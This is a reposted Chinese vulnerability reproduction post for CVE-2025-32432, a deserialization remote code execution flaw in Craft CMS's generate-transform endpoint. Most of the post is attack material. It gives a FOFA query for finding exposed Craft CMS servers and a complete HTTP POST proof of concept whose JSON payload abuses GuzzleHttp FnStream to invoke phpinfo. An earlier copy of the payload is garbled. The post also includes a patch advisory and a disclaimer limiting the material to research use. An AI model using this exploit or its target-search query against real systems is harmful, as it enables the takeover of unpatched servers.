Craft CMS generate-transform接口存在远程命令执行漏洞CVE-2025-32432 附POC

admin 2025年5月7日10:45:30评论0 views字数 1702阅读5分40秒阅读模式

1. Craft CMS 简介

微信公众号搜索:南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发

Craft CMS

2.漏洞描述

Craft CMS 是一个灵活、用户友好的内容管理系统,用于创建自定义的数字网络体验和其他体验。CVE-2025-32432 中,攻击者可构造恶意请求利用generate-transform端点触发反序列化,执行任意代码,控制服务器。官方已发布安全更新,建议升级至最新版本。

CVE编号:CVE-2025-32432

CNNVD编号:

CNVD编号:

3.影响版本

3.0.0-RC1 <= Craft <= 3.9.15 4.0.0-RC1 <= Craft <= 4.14.15 5.0.0-RC1 <= Craft <= 5.6.17

Craft CMS generate-transform接口存在远程命令执行漏洞CVE-2025-32432 附POC
Craft CMS generate-transform接口存在远程命令执行漏洞

4.fofa查询语句

header="X-Powered-By: Craft CMS"|| banner="X-Powered-By: Craft CMS"

5.漏洞复现

漏洞链接:https://xx.xx.xx.xxx/index.php?p=admin/actions/assets/generate-transform

POST:

{"assetId":11,"handle":{ width":123,"height":123,"assession":{"class":"craft\\behaviors \\FieldLayoutBehavior","__ class":"GuzzleHttp\\Psr7\\FnStream".__construct()":[[]]," _fn_close”:"phpinfo"}},"9qsccmw8lve":"=""}
Craft CMS generate-transform接口存在远程命令执行漏洞CVE-2025-32432 附POC

6.POC&EXP

POST /index.php?p=admin/actions/assets/generate-transform HTTP/2
Host: 
Cookie: CRAFT_CSRF_TOKEN=e40fa024c0415d8febe047e1b10cb29c177af6f7078425b4a4ad51baa12ead4aa%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A40%3A%22IxdRpsRcEf5rV4Mg9Rlm6oO8MI482Vi9M-arQ6hi%22%3B%7D
Content-Type: application/json
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
X-Csrf-Token: mCR9N18c3CaAqUXR6nDCW4gZo0t8cHzu47I46ULar9yg2OGu6dafjNFcGWUvb45Fxc9wo7xEjzyxS88mSh8z1q77DNFwjMbl7fWA3Ljg9-U=
Content-Length: 215
{"assetId":11,"handle":{"width":123,"height":123,"as session":{"class":"craft\\behaviors\\FieldLayoutBehavior","__class":"GuzzleHttp\\Psr7\\FnStream","__construct()":[[]],"_fn_close":"phpinfo"}},"9qsccmw8lve":"="}

7.整改意见

官方已发布安全更新,建议升级至最新版本

原文始发于微信公众号(南风漏洞复现文库):Craft CMS generate-transform接口存在远程命令执行漏洞CVE-2025-32432 附POC

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月7日10:45:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Craft CMS generate-transform接口存在远程命令执行漏洞CVE-2025-32432 附POChttps://cn-sec.com/archives/4035749.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息